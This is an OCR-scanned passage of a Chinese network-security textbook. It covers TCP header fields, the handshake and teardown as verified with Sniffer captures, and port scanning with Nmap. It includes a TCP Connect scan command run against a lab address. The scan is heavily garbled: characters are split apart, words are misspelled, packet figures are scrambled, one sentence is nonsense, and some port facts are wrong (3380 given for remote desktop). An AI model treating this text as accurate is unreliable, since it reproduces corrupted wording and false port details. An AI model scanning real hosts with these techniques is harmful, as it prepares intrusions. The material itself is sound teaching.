自己 的 最 大 数据 量 ,单位 为 字 节 。 窗 口 字段 的 大 小 是 由 接收 端 缓存 空间 大 小 来 确定 的 。 
窗口 字段 主要 用 于 流量 控制 。 

检验 和 字段 : 占 2 字 节 。 检 验 和 字段 检验 的 范围 包括 TCP 报 文 段 首部 和 数据 两 部 
分 。 如 果 TCP 报 文 段 在 传输 过 程 中 数据 发 生变 化 ,这 个 校 验 和 字段 就 能 识别 出 来 。TCP 
报 文 段 首部 的 检验 和 字段 和 了 P 数据 报 首部 的 检验 和 字段 不 同 ,IP 数据 报 的 检验 和 字段 
只 对 IP 数据 报 首部 进行 检验 。 

紧急 指针 字段 : 当 紧 急 比 特 URG 二 1 时 ,TCP 报 文 段 首部 中 的 紧急 指针 字段 被 启 
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用 。 紧 急 指针 字段 的 值 表示 当前 TCP 报 文 段 紧急 数据 的 最 后 一 个 字 节 的 序号 。 紧 急 数 
据 长 度 是 从 TCP 报 文 段 数据 部 分 的 第 一 个 字 节 到 紧急 指针 指向 的 字 节 。 


8.33 利用 Sniffer 分 析 三 次 握手 建立 TCP 连接 


由 于 TCP 是 面向 连接 的 协议 ,在 每 一 次 通信 中 ,都 需要 建立 连接 、 数 据 传送 和 释放 连 
接 的 三 个 步骤 。TCP 的 连接 和 建立 都 采用 客户 服务 器 方式 。 主 动 发 起 建立 连接 的 应 用 
进程 叫做 客户 (client) ,而 被 动 等 待 连接 建立 的 应 用 进程 叫做 服务 器 (server)。 下 面 学 习 
建立 TCP 连接 的 三 次 握手 。 

主机 A 作为 客户 端 ,主机 B 作为 服务 器 端 。 主 机 B 应 用 层 运行 一 个 服务 器 进程 , 它 
先 发 出 一 个 被 动 打开 的 命令 ,告诉 它 的 运输 层 , 准 备 接收 客户 进程 的 连接 请 求 。 然 后 , 服 
务 器 进程 就 处 于 听 的 状态 ,不 断 检测 是 否 有 客户 进程 发 起 连接 请 求 ,如 有 , 即 做 出 响应 。 
主机 A 应 用 层 运 行 一 个 客户 进程 , 它 先 向 传输 层 发 出 一 个 主动 打开 命令 ,告诉 它 的 运输 
层 , 准 备 和 主机 B 的 服务 器 进程 建立 连接 。 然 后 就 是 建立 TCP 连接 的 三 次 握手 。 首 先 ， 
主机 A 运输 层 TCP 向 主机 B 运输 层 TCP 发 出 请 求 建立 连接 的 报 文 段 ,这 就 是 建立 TCP 
连接 的 第 一 次 握手 。 当 主机 B 收 到 这 个 请 求 建立 连接 的 报 文 段 后 ,如 同意 建立 连接 , 则 
回 送 确认 报 文 段 。 这 就 是 建立 TCP 连接 的 第 二 次 握手 。 当 主机 A 收 到 来 自主 机 B 的 确 
认 报 文 段 后 ,要 向 B 发 送 这 个 确认 的 确认 报 文 段 。 这 就 是 建立 TCP 连接 的 第 三 次 握手 。 
接着 ,主机 A 的 TCP 通知 其 应 用 层 客 户 进程 已 经 建立 连接 。 主 机 B 的 TCP 收 到 主机 A 
发 来 的 第 三 次 握手 的 确认 报 文 段 后 ,也 通知 其 应 用 层 的 服务 器 进程 连接 已 经 建立 。 这 就 
是 使 用 三 次 握手 建立 TCP 连接 的 过 程 ( 见 图 8-12) 。 

主机 A 主机 B 


客户 服务 器 
主动 打开 被 动 打 开 
SYN, SEQ=x 

连接 请 求 一 
SYN, ACK, ACK=x+1, SEQ=y 
和 确认 


» ACK, SEQ=x+1, ACK=y+l1 
确认 Q 3 


图 8-12 建立 TCP 连接 的 三 次 握手 


在 建立 TCP 连接 的 三 次 握手 中 ,三 个 TCP 报 文 段 首部 的 同步 比特 SYN 和 确认 比特 
ACK 的 值 各 为 多 少 ? 在 建立 TCP 连接 的 第 一 次 握手 中 ,主机 A 向 主机 B 发 出 请 求 建立 
连接 的 报 文 段 , 报 文 段 首部 同步 比特 SYN 置 1, 而 确认 比特 ACK 值 为 0, 表示 这 个 报 文 
段 首 部 的 确认 号 字段 无 效 。 然 后 ,在 建立 TCP 连接 的 第 二 次 握手 中 ,当主 机 也 同意 建立 
连接 , 回 送 的 确认 报 文 段 中 ,同步 比特 SYN 仍然 置 为 1, 这 由 于 对 建立 一 个 TCP 连接 通 
信 双 方 必须 都 要 先 各 发 送 一 个 同步 比特 SYN 为 1 的 报 文 段 。 同 时 ,确认 比特 ACK 也 置 
为 1, 表示 确认 报 文 段 确认 号 字段 有 效 。 最 后 ,在 建立 TCP 连接 的 第 三 次 握手 中 ,当主 机 
A 向 主机 B 发 送 最 后 确认 的 报 文 段 时 ,这 个 确认 报 文 段 的 确认 比特 ACK 也 要 置 为 1, 而 
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同步 比特 SYN 置 为 0。 图 8-12 中 同步 比特 SYN 和 确认 比特 ACK 为 0 时 省 略 。 同 步 比 
特 SYN=1 时 ,直接 用 SYN 表示 。 确认 比特 ACK= 二 1 时 ,直接 用 ACK 表示 。 而 后 面 接 


数值 的 ACK 表示 确认 号 字段 。 
查看 Sniffer 捕捉 到 的 数据 包 ( 见 图 8-13 一 


8-15) ,可 以 验证 建立 TCP 连接 三 次 握 


手 的 各 报 文 段 的 同步 比特 SYN 和 确认 比特 ACK 值 。 


[192.168.111.3]|[192.168.111.1] |TCP: D=1306 S=21 SYN ACK=4079202834 SEQ=2223 
[192.168.111.1]|[192.168.111.3] |TCP: D=21 S=1306 


Source port 
Destination port 


TCP: Initial sequence nunber = 4079202833 
CP: Next expected Seq number= 4079202834 
CP: Data offset = 28 bytes 
TCP: Reserved Bits: Reserved f 


(No FIN) 
Window 65535 
Checksum 


Urgent pointer 


0 


Options follow 
Maxinun segnent size = 1460 
No-Operation 

No-Operaticn 

SACK-Pernitted Option 


21 (FTP-ctrl) 


or Future Use (Not shown in the Hex Dump) 


TCP: Flags 02 
TCP 0 = (No urgent pointer) 
TCP 0 = (No acknowledgnent) 
= (No push) 
(No reset) 


7965 (correct) 


ACK=2223306046 WIN=6553 


TCP header 一 -一 


Options follow 

Maximun segnent size = 1460 
No-Operation 

No-Operation 
SACK-Pernitted Option 


TCP; Source port = 21 (FTP-ctrl) 
TCP; Destination Port = 1306 
TCP; Initial sequence nunber = 2223306045 
TCP: Next expected Seq nunber= 2223306046 
TCP: Acknowledgnent number = 4079202834 
TCP: Data offset = 28 bytes 
TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dump) 
TCP: Flags = 12 
TCP 0 = (No urgent pointer) 
TCP 1 = Acknovledgment 
TCP = (No push) 
TCP: 本 = (No reset) 
TCP = SYN 
TCP = (No FIN) 
TCP: Window = 64240 
TCP: Checksum = 04A1 (correct) 
TCP: Urgent pointer =0 
电 TcP 


图 8-14 Sniffer 捕 提 的 第 二 次 握手 TCP 报 文 段 首部 各 字段 的 值 


下 面 介 绍 建立 TCP 连接 三 次 握手 的 三 个 TCP 报 文 段 首部 的 序号 字段 和 确认 号 字段 


值 的 设置 方法 。 设 主机 A 向 主机 B 发 出 的 第 一 
次 握手 报 文 段 是 同步 比特 SYN 置 1 的 报 文 段 ,TCP 标准 规定 ,SYN 置 1 的 报 文 


由 于 第 一 


次 握手 的 报 文 段 首部 序号 字段 值 为 x。 
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TI92 T58 -TIT TE8-TIT-3J TTCE D=21 5S=1306 SYN SEO=1T079202833 TEN=U WIN=65535] 
口 | 2 192 168 111 3]|[192 168 111 1] |TCP. D=1306 S=21 SYN ACK=4079202834 SEQ=2223306045 


电 TcP: Source port = 1306 
TCP: Destination port = 21 (FTP-ctrl) 
TCP; Sequence nunber = 4079202834 
TCP: Next expected Seq nunber= 4079202834 
TCP: Acknowledgnent nunber = 2223306046 
妨 TCP: Data offset = 20 bytes 
TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
TCP: Flags 10 
TCP 0 = (No urgent pointer) 
曙 TcP 1 = Acknowledgment 
TCP 0 Ho push) 
TCP 0 = (No SYN) 
TCP 0 = (No FIN) 
TCP: Vindow = 65535 
TCP: Checksun = 2C56 (correct) 


TCP: Urgent pointer =-0 


TCP: No TCP options 


图 8-15 Sniffer 捕捉 的 第 三 次 握手 TCP 报 文 段 首部 各 字段 的 值 


段 只 消耗 掉 一 个 序号 ,因此 ,主机 A 向 主机 B 发 送 的 下 一 个 报 文 段 首部 序号 字段 值 应 为 
Zz 十 1。 而 这 个 报 文 段 恰好 是 建立 TCP 连接 第 三 次 握手 的 确认 报 文 段 。 因 此 ,第 三 次 握 
手 报 文 段 首部 的 序列 号 字段 的 值 应 为 zx 十 1。 由 此 ,也 可 以 推出 第 二 次 握手 的 报 文 段 首部 
的 确认 号 字段 值 应 为 zx 十 1, 表 示 期 望 收 到 主机 A 发 来 的 下 一 个 报 文 段 ( 即 第 三 次 握手 报 
文 段 ) 首 部 的 序号 字段 值 为 zx 十 1, 下 一 个 报 文 段 正 好 就 是 第 三 次 握手 的 报 文 段 。 查 看 
Sniffer 捕捉 到 的 数据 包 ( 见 图 8-13 一 图 8-15) ,第 一 次 握手 报 文 段 的 序号 字段 值 为 
4079202833 ,第 二 次 握手 报 文 段 的 确认 号 字段 ACK 值 为 4079202834 ,第 三 次 握手 报 文 段 
的 序号 字段 值 为 4079202834 ,满足 上 述说 明 。 
下 面 介绍 主机 也 序号 的 设置 方法 。 设 第 二 次 握手 主机 B 发 送 给 主机 A 的 报 文 段 首 
部 的 序号 字段 的 值 为 y。 由 于 这 个 第 二 次 握手 的 报 文 段 也 是 同步 比特 SYN 置 1 的 报 文 
段 ,只 消耗 掉 一 个 序号 ,因此 主机 B 发 送 的 下 一 个 报 文 段 首部 的 序号 字段 值 应 为 y 十 1。 
由 此 推出 主机 A 向 主机 B 发 送 的 第 三 次 握手 报 文 段 的 确认 号 字段 值 也 应 为 > 十 1, 表 示 
期 望 收 到 主机 B 发 来 的 下 一 个 报 文 段 首部 序号 字段 值 为 y 十 1。 查 看 Sniffer 捕捉 到 的 数 
据 包 ( 见 图 8-13 一 图 8-15) ,第 二 次 握手 报 文 段 的 序号 字段 值 为 2223306045 ,第 三 次 握手 
报 文 段 的 确认 号 字段 ACK 值 为 2223306046 ,满足 上 述说 明 。 


834 利用 Sniffer 分 析 四 次 挥手 释放 TCP 连接 


通过 三 次 握手 建立 TCP 连接 以 后 , 接 下 来 就 是 数据 传输 阶段 。 数 据 传 输 结束 后 , 通 
信 双 方 都 可 以 发 出 释放 连接 的 请 求 ,也 就 是 TCP 连接 释放 的 阶段 。 首 先 ,主机 A 的 应 用 
层 应 用 进程 向 主机 A 运输 层 的 TCP 发 出 释放 连接 请 求 ,并且 不 再 向 其 运输 层 发 送 报 文 。 
接着 ,主机 A 运输 层 TCP 通知 主机 B 运输 层 TCP 请 求 释放 连接 。 当 主机 也 的 TCP 收 
到 这 个 请 求 释放 连接 的 报 文 段 后, 则 向 上 通知 其 应 用 层 的 应 用 进程 ,这 样 ,从 A 到 B 的 连 
接 就 释放 了 ,连接 处 于 半 关 闭 状态 ,相当 于 主机 A 不 再 向 主机 B 发 送 数据 ,但 若 主机 B 还 
有 数据 发 往 主机 A, 仍 可 以 继续 发 送 。 然 后 ,主机 B 向 主机 A 发 出 确认 报 文 段 ,确认 A 到 
B 的 连接 释放 。 若 此 时 主机 B 也 不 想 向 主机 A 发 送 数 据 , 则 主机 B 的 应 用 层 应 用 进程 就 
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通知 主机 B 运输 层 TCP 释放 连接 ,并 且 不 再 向 运输 层 TCP 发 送 报 文 。 接 着 ,主机 B 向 主 
机 A 发 出 请 求 释放 连接 报 文 段 。 主 机 A 不 管 收 到 主机 B 发 来 的 确认 报 文 段 还 是 请 求 释 
放 连 接 报 文 段 ,都 必须 发 出 最 后 的 确认 报 文 段 。 随 后 ,主机 A 的 TCP 向 其 应 用 进程 报 
告 ,整个 连接 已 经 全 部 释放 。 上 述 释 放 TCP 连接 过 程 和 建立 TCP 连接 时 的 三 次 握手 在 
本 质 上 是 一 致 的 ,因此 ,也 称 释放 TCP 连接 的 过 程 为 四 次 挥手 的 过 程 ( 见 图 8-16) 。 

主机 A 主机 B 


应 用 进程 释 _ 
放 连 接 ，A 不 se 通知 主机 应 用 进程 


再 发 送 报 文 ACK, ACK=x+1, SEQ=y 


确认 
应 用 进程 释放 连接 


ACK, SEQ=x+1, ACK=p+1 B 不 在 发 送 报 文 
确认 和 


图 8-16 释放 TCP 连接 的 四 次 挥手 


FIN, ACK, ACK=x+1, SEQ=y 
一 


下 面 介绍 在 释放 TCP 连接 的 四 次 挥手 过 程 中 ,4 个 TCP 报 文 段 首 部 的 终止 比特 
FIN 和 确认 比特 ACK 的 值 。 第 一 次 挥手 中 主机 A 向 主机 B 发 送 请 求 释 放 连 接 的 报 文 
段 , 报 文 段 首部 的 终止 比特 FIN 置 为 1。 第 二 次 挥手 中 主机 也 向 主机 A 发 出 的 确认 报 文 
段 对 刚 收 到 的 第 一 次 挥手 报 文 段 的 确认 ,其 首部 的 确认 比特 为 1, 而 终止 比特 FIN 置 为 
0。 这 样 ,从 A 到 B 的 连接 就 释放 了 ,连接 处 于 半 关 闭 状态 ,主机 A 不 再 向 主机 B 发 送 数 
据 。 由 于 第 二 次 挥手 报 文 段 的 终止 比特 FIN 未 置 为 1, 表 示 主 机 B 仍 可 以 向 主机 A 发 送 
数据 。 在 第 三 次 挥手 中 ,车 主机 B 也 不 向 主机 A 发 送 数据 , 则 主机 B 向 主机 A 发 出 请 求 
释放 连接 的 报 文 段 。 这 个 报 文 段 终止 比特 FIN 置 1, 确 认 比特 ACK 也 置 1, 表 示 再 次 确 
认 第 一 次 挥手 的 报 文 段 。 最 后 ,在 第 四 次 挥手 的 确认 报 文 段 中 ,确认 比特 ACK 置 1, 而 终 
止 比特 FIN 置 为 0。 因 为 ,从 A 到 BB 的 连接 已 经 释放 了 。 由 此 可 以 看 出 ,释放 TCP 连接 
时 ,通信 双方 只 需要 各 发 送 一 个 终止 比特 FIN 置 为 1 的 报 文 段 就 可 以 了 。 图 8-16 中 终止 
比特 FIN 和 确认 比特 ACK 为 0 时 省 略 。 终 止 比特 FIN=1 时 ,直接 用 FIN 表示 。 确认 
比特 ACK= 二 1 时 ,直接 用 ACK 表示 。 而 后 面 接 数值 的 ACK 表示 确认 号 字段 。 

查看 Sniffer 捕捉 到 的 数据 包 ( 见 图 8-17 一 图 8-20) ,可 以 验证 释放 TCP 连接 的 四 次 
挥手 的 各 报 文 段 的 终止 比特 FIN 和 确认 比特 ACK 的 值 。 

下 面 介 绍 释放 TCP 连接 四 次 挥手 的 4 个 TCP 报 文 段 首部 的 序号 字段 和 确认 号 字段 
值 的 设置 方法 。 设 主机 A 向 主机 B 发 送 的 第 一 次 挥手 报 文 段 首部 序号 字段 值 为 zx。 由 
于 这 个 报 文 段 是 终止 比特 FIN 置 1 的 报 文 段 ,只 消耗 一 个 序号 ,那么 发 送 端 A 发 送 的 下 
一 个 报 文 段 首部 的 序号 字段 值 应 为 x 十 1. 而 这 个 报 文 段 恰好 是 第 四 次 挥手 报 文 段 ,因此 ， 
这 个 第 四 次 挥手 报 文 段 首部 的 序号 字段 的 数值 应 为 zx 十 1。 由 此 推出 第 二 次 挥手 和 第 三 
次 挥手 报 文 段 确认 号 字段 的 值 应 为 ACK= 二 x 十 1, 表 示 主 机 B 期 望 收 到 主机 A 发 来 的 下 
一 个 报 文 段 ( 即 第 四 次 挥手 报 文 段 ) 首 部 的 序号 字段 值 为 zx 十 1。 查 看 Sniffer 捕捉 到 的 数 
据 包 ( 见 图 8-17 一 图 8-20) ,第 一 次 挥手 报 文 段 的 序号 字段 值 为 1244756262, 第 二 次 挥手 
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TCP: Source port = 1089 

TCP: Destination port = 1310 

TCP: Sequence number = 1244756262 

TCP: Next expected Seq number= 1244756263 
易 TCP: hcknowvledgnent nunber 2360590046 


TCP: Data offset 20 bytes 

TCP: Reserved Bits; Reserved for Future Use (Not shown in the Hex Dunp) 
TCP: Flags Ee 

TCP 0 (No urgent pointer) 
TCP 1 Acknowledgnment 

TCP (No push) 

TCP: (No reset) 

TCP (No SYN) 

TCP FIN 

TCP: Window 64240 

TCP: Checksum = 3D44 (correct) 

TCP: Urgent pointer =0 

TCP: No TCP options 

TCP 


图 8-17 Sniffer 捕 提 的 第 一 次 挥手 TCP 报 文 段 首部 各 字段 的 值 


89 S=1310 FIN ACK=1244756263 SEQ=236059004 
10 S=1089 ACK=2360590047 WIN=64240 


TCP: Source port = 1310 
TCP: Destination port = 1089 
TCP: Sequence nunber = 2360590046 
TCP: Next expected Seq nunber= 2360590046 
TCP: Acknowledgnent nunber = 1244756263 


TCP: Data offset = 20 bytes 
TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
TCP: Flags = 10 

TCP 0 = (No urgent pointer) 

TCP 0 (No push) 

TCP 0 (No reset) 

TCP 0. = (No SYN) 

TCP 0 = (No FIN) 

TCP: Window = 65526 

TCP: Checksum = 383E (correct) 

TCP: Urgent pointer =0 


TCP: No TCP options 


图 8-18 Sniffer 捕 提 的 第 二 次 挥手 TCP 报 文 段 首部 各 字段 的 值 


| | [192.168.111.3]|[192.168.111.1] |TCP: D=1310 089 FIN ACK=2360590046 SEQ=12447562 
192 168 111 1] [192 168 111 3] ITCP. D=1089 有 7 


192 168 11l 1 92 16 1 
68.111.3] 6 ACK=23605900. 


| 


Source port = 1310 
Destination port = 1089 
Sequence nunber 2360590046 
Next expected Seq nunber= 2360590047 
Acknowledgnent nunber 1244756263 


Data offset = 20 bytes 
Reserved Bits; Reserved for Future Use (Not shown in the Hex Dump) 
Flags 11 
(No urgent pointer) 
= Acknovledgnent 


0... = (No push) 
(No reset) 
(No SYN) 
FIN 
Vindow = 65526 
Checksun = 383D (correct) 
Urgent pointer =0 


No TCP options 


图 8-19 Sniffer 捕 提 的 第 三 次 挥手 TCP 报 文 段 首部 各 字段 的 值 


Ee 第 8 章 运 


绞 TCP: -一 一 TCP header 一 一 一 


- 恩 TCF 


坊 TCP: Source port = 1089 
转 TCP: Destination port = 1310 
TCP: Sequence number = 1244756263 
TCP: Next expected Seq nunber= 1244756263 
TCP: Acknowledgnent nunber = 2360590047 
太 TCP: Data offset = 20 bytes 
加 TCP: Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
TCP: Flags 10 
TCP 0 = (No urgent pointer) 
TCP: .il .= Acknowledgnent 
TCP 0... = (No push) 
TCP 0.. = (No reset) 
TCP 0. = (No SYN) 
TCP 0 = (No FIN) 
TCP: Window = 64240 
TCP: Checksum = 3D43 (correct) 
TCP: Urgent pointer =0 


TCP: No TCP options 
TCP 


图 8-20 Sniffer 捕捉 的 第 四 次 挥手 TCP 报 文 段 首部 各 字段 的 值 


报 文 段 的 确认 号 字段 ACK 值 为 1244756263 ,第 三 次 挥手 报 文 段 的 确认 号 字段 值 为 
1244756263 ,第 四 次 挥手 报 文 段 序 号 字段 的 值 为 1244756263 ,满足 上 述说 明 。 

下 面 介绍 主机 B 序 号 的 设置 方法 。 假 设 在 第 二 次 挥手 报 文 段 首 部 序号 字段 值 为 y。 
由 于 第 二 次 挥手 报 文 段 是 终止 比特 FIN 置 0 的 报 文 段 ,不 消耗 序号 ,因此 ,可 以 推出 主机 
B 发 送 的 下 一 个 报 文 段 首部 的 序号 字段 值 也 为 y, 而 这 个 报 文 段 恰好 是 第 三 次 挥手 报 文 
段 ,因此 ,第 三 次 挥手 的 报 文 段 序号 字段 的 值 为 y。 由 于 第 三 次 挥手 报 文 段 是 终止 比特 
FIN 置 1 的 报 文 段 , 只 消耗 掉 一 个 序号 ,因此 可 以 推出 ,主机 B 发 送 的 下 一 个 报 文 段 首部 
的 序号 字段 值 为 y 十 1。 由 此 可 以 得 到 第 四 次 挥手 报 文 段 的 确认 号 字段 值 也 应 为 ACK= 
y 十 1, 表 示 期 望 收 到 主机 B 发 来 的 下 一 个 报 文 段 首部 的 序号 字段 , 值 为 y 十 1。 查 看 
Sniffer 捕捉 到 的 数据 包 ( 见 图 8-17 一 图 8-20), 第 二 次 挥手 报 文 段 的 序号 字段 值 为 
2360590046 ,第 三 次 挥手 报 文 段 的 序号 字段 值 为 2360590046 ,第 四 次 挥手 报 文 段 的 确认 
号 字段 值 为 2360590047 ,满足 上 述说 明 。 

下 面 介绍 与 TCP 相关 的 网 络 安全 问题 。 


84 ”端口 扫描 


网 络 扫描 是 利用 工具 软件 对 目标 主机 进行 扫描 ,目的 是 发 现 目标 主机 存在 的 漏洞 。 
网 络 扫描 是 一 把 双 刃 剑 , 对 于 系统 安全 管理 员 来 说 ,可 以 通过 网 络 扫描 ,查询 出 自身 系统 
的 安全 漏洞 ,及 时 发 现 ,及 时 修补 ,确保 自己 系统 的 安全 。 但 是 ,如 果 网 络 扫描 被 黑客 所 利 
用 ,黑客 就 可 以 使 用 网 络 扫描 来 查找 系统 的 入侵 点 。 

如 果 查 看 得 到 了 一 台 主 机 开放 的 端口 ,可 以 通过 主机 开放 的 端口 获得 一 些 非常 重要 
的 信息 。 比 如 : 80 端口 开放 说 明 这 台 主 机 提供 了 Web 服务 ,安装 了 Web 服务 器 ;110 和 
25 端口 开放 说 明 主 机 提供 了 SMTP 和 POP3 服务 ,安装 了 邮件 服务 器 ,提供 了 邮件 服务 ; 
21 端口 开放 说 明 这 台 主 机 安装 了 FTP 服务 器 ;3380 端口 开放 说 明 主 机 提供 了 远程 桌面 

219 


输 层 协议 及 其 安全 问题 ”Bm 


IE 网 络 安全 基础 ”gl 


连接 的 服务 ;1433 端口 开放 说 明 主 机 安装 了 SQL Server 2000 ,提供 了 远程 访问 端口 。 如 
果 获 得 了 远程 主机 开放 了 哪些 端口 ,就 可 以 通过 它 开 放 的 端口 ,得 知 主机 上 运行 了 哪些 服 
务 ,就 可 对 这 些 服务 的 漏洞 进行 黑客 攻击 。 由 此 知道 ,通过 扫描 目的 主机 开放 的 端口 号 ， 
为 黑客 下 一 步 网 络 人 侵 做 了 前 期 准备 。 

使 用 什么 方法 知道 远程 主机 开放 了 哪些 端口 呢 ? 就 是 网 络 扫描 中 的 端口 扫描 。 这 个 
端口 扫描 是 利用 TCP 连接 的 三 次 握手 来 实现 的 。 

端口 扫描 最 常 使 用 的 就 是 非常 著名 的 端口 扫描 软件 Nmap, Nmap 提供 了 广泛 的 端 
口 扫描 技术 。 在 电影 (黑客 帝国 2) 中 , 女 黑 客 Tritnity 就 使 用 Nmap ,攻击 目标 服务 器 ,来 
破坏 发 电厂 的 安全 。 美 国 前 总 统 小 布什 ,在 视察 国家 安全 局 的 照片 上 ,也 出 现 过 Nmap 这 
个 软件 


841 TCP 端 口 扫 描 


本 章 介 绍 三 种 TCP 端口 扫描 的 方法 。 

第 一 种 TCP 端口 扫描 方法 是 TCP Connect 扫描 ( 见 图 8-21) ,这 种 方法 是 依次 尝试 
和 目标 主机 的 各 个 TCP 端口 建立 连接 ,如 果 能 建立 连接 ,说 明 这 个 端口 开放 ;如 果 未 建立 
连接 ,说 明 这 个 端口 是 关闭 的 。 


客户 端 目标 机 客户 端 目标 机 
端口 号 端口 号 端口 号 端口 号 
800 2 8001 21 
号 
SYN cc SYN i 
ss RST 
目标 机 开放 21 端 口 目标 机 未 开放 21 端 口 


图 8-21 TCP Connect 扫描 目标 主机 的 TCP 端口 


假如 黑客 主机 作为 客户 端 主机 通过 8001 端口 探测 目标 主机 21 端口 是 否 开 放 。 如 果 
目标 主机 21 端口 处 于 开放 状态 ,那么 三 次 握手 过 后 就 可 以 成 功 建立 TCP 连接 。 由 此 , 扫 
描 主 机 已 经 判断 目标 主机 21 端口 是 开放 的 ,就 需要 及 时 终止 这 个 TCP 连接 。 扫 描 主 机 
就 返回 一 个 RST 报 文 段 , 即 报 文 段 首部 复位 比特 RST 为 1 ,表示 终止 这 个 TCP 连接 。 因 
为 ,此 时 扫描 主机 已 经 知道 目标 主机 21 端口 是 开放 的 ,就 不 必 再 建立 连接 了 。 如 果 21 端 
口 不 开放 呢 ? 扫描 主机 发 送 第 一 次 握手 报 文 段 后 ,目标 主机 就 直接 返回 RST 报 文 段 , 表 
示 目 标 主 机 21 端口 是 关闭 的 ,不 能 提供 服务 ,拒绝 建立 连接 。 

我 们 使 用 Nmap 扫描 配合 Sniffer 抓 包 的 方法 验证 TCP Connect 端口 扫描 原理 。 扫 
描 主 机 (IP 地 址 192. 168. 111. 1) 启 动 Sniffer 开始 抓 包 。 在 Zenmap(Nmap 的 图 像 界面 
软件 ) 窗 口 输入 命令 : 

nmap -sT - p 21 192.168.111.3 
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这 里 -sT 表示 TCP Connect 扫描 ,-p 后 接 要 扫描 的 端口 ,最 后 是 目标 主机 的 IP 地 址 。 

扫描 结束 ,得 到 目标 主机 的 21 端口 是 开放 的 端口 ( 见 图 8-22) 。Sniffer 停止 抓 包 , 清 
晰 看 到 已 经 捕 提 了 4 个 TCP 包 ( 见 图 8-23)。 通 过 这 4 个 数据 包 , 可 以 分 析出 TCP 
Connect 扫描 的 通信 过 程 ,扫描 主机 在 三 次 握手 建立 TCP 连接 后 ,再 返回 的 一 个 RST 报 
文 段 ,表示 拒绝 建立 这 个 连接 ,同时 确认 目标 主机 的 21 端口 是 开放 的 。 


Scan Toos Profle Help 
Target: [lsz 168.111.3 司 Profile: ww lsean 


;|mmap -sT -p 21 192.168.111.3 


[Services Nnap Output |Ports / Hosts| Topology| Host Details| Scans| 
mp -sT -p 21 192.168.111.3 国 可 


0S «Host < 
192. 168.111.3 


Starting Nnap 5.51 ( htcp://mmap.org ) ac 2012-08-22 13:53 
中 国标 准时 间 


Nnap scan report for 192.168.111.3 
mass_dns: warning: Unable to determine any DNS servers, 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.0020s latency). 

PORT 。 STATE SERVICE 

21/tcp open ftp 

MRC Ndress: 90:0C:29:C8:17:3D (Yiware) 


map done: 1_ IP address (1 host up) scanned in 0.66 seconds 


图 8-22 Nmap 使 用 TCP Connect 扫描 目标 主机 开放 的 端口 


E 5= =746 HN SEQ=577930 N= VIN=E 
[192 168 111: 3] [192 168 111 1] TCE D= 2480 Se= 21 By ACK=527930156 SEQ=1948362049 LEN=0 WIN=64 


I 459 3 1] 3 i460 1 3] Top: D=21 S=2480 ACK=1948362050 WIN=65535 
TCP: D=21 S=2480 RST ACK=1948362050 WIN=0 


图 8-23 使 用 Sniffer 捕捉 TCP Connect 扫描 目标 主机 开放 端口 的 通信 过 程 


接着 ,使 用 TCP Connect 进行 关闭 端口 的 扫描 。Sniffer 重新 开始 抓 包 , 在 Zenmap 
窗口 输入 同样 的 TCP Connect 端口 扫描 命令 : 


nmap - sT -p 21 192.168.111.3 


得 到 扫描 结果 ( 见 图 8-24) ,显示 21 端口 是 Filered, 表 示 存 在 防火 墙 或 包 过 滤器 等 网 络 安 
全 软件 禁止 了 21 端口 。 

Sniffer 停止 抓 包 ,可 以 看 到 已 经 捕捉 了 4 个 TCP 包 ( 见 图 8-25)。 在 端口 关闭 状态 
下 ,发 起 扫描 的 主机 发 送 第 一 次 握手 的 报 文 段 ,目标 主机 直接 返回 RST 报 文 段 , 表 示 目 标 
主机 21 端口 是 不 开放 的 。 从 Sniffer 捕捉 的 数据 包 可 以 看 到 ,扫描 主机 是 连续 两 次 发 送 
第 一 次 握手 的 报 文 段 来 探测 目标 主机 的 21 端口 是 否 关 闭 , 目 标 主机 两 次 都 返回 RST 报 
文 段 。 

这 就 是 TCP Connect 扫描 的 原理 ,由 于 它 使 用 三 次 握手 建立 TCP 连接 ,三 次 握手 全 
部 完成 ,所 以 这 种 扫描 技术 也 被 称 为 全 连接 扫描 。 

由 于 TCP 全 连接 扫描 ,需要 整个 TCP 三 次 握手 以 后 才能 判断 端口 是 否 开放 ,整个 扫 
描 过 程 较 慢 ， 共 实 在 第 三 次 反手 的 报 广度 收 到 以 后 5 得 描 主 机 就 可 以 判断 目标 加 癌症 奉天 
放 , 而 不 需要 发 送 第 三 次 握手 的 报 文 段 。 这 样 ,就 有 了 第 二 种 扫描 TCP 端口 的 方法 TCP 
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Scan Tooks Profle Help 


Target: |192.1 


68. 111.3 WM Profile: 司 Eas] [ca 


Command: |mmap 


-sT -? 21 192.168.111.3 


Josts | Services ap Output [Ports / Hosts| Topology| Host Details| Scans| 


0S 4 Host 
时 192. 168. 


[ms -sT -p 21 192.168.111.3 国 3 | 


111.3 


Starting Nuap 5.51 ( http://nmap.org ) at 2012-08-22 13:57 
中 国标 准时 间 


Nnap scan report for 192.168.111.3 
mass_dns: warning: Unable to determine any DNS servers. 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.00s latency). 

PORT ”STATE 。 SERVICE 

21/tcp filtered ftp 

MAC Address:_00:0C:29:C8:17:3D (VMware) 


Nnap done: 1 IP address (1 host up) scanned in 0.88 seconds 


图 8-24 


EE 68.111 
[192.168.111.3]| 


Nmap 使 用 TCP Connect 扫描 目标 主机 的 关闭 端口 


二 0= 800 =0 = 
32 168 111 1] TCP D- 2484 S= 21 Bel ACK= 3558468001 VIN=0 
92.168.111.3]|TCP: D=21 S=2485 SYN SEQ=1438255797 LEN=0 WIN=65535 


1 
[192.168.111.1] [1 
192.168.111 3] [1 


图 8-25 使 用 


SYN 扫描 ( 见 图 8-26) 。 


92.168.111.1]ITCP: D=2485 S=21 RST ACK=1438255798 WIN=0 


Sniffer 捕捉 TCP Connect 扫描 目标 主机 关闭 端口 的 通信 过 程 


客户 端 目标 机 客户 端 目标 机 
端口 号 端口 号 端口 号 端口 号 
8001 21 8001 21 


目标 机 开放 21 端 口 目标 机 未 开放 21 端 口 


图 8-26 TCP SYN 扫描 目标 主机 的 TCP 端口 


在 TCP SYN 扫描 方法 中 ,扫描 主机 通过 8001 端口 向 目标 主机 21 端口 发 送 SYN 报 

文 段 ,也 就 是 第 一 次 握手 的 报 文 段 。 如 果 目 标 主机 返回 RST 报 文 段 ,说 明 目 标 主机 21 端 

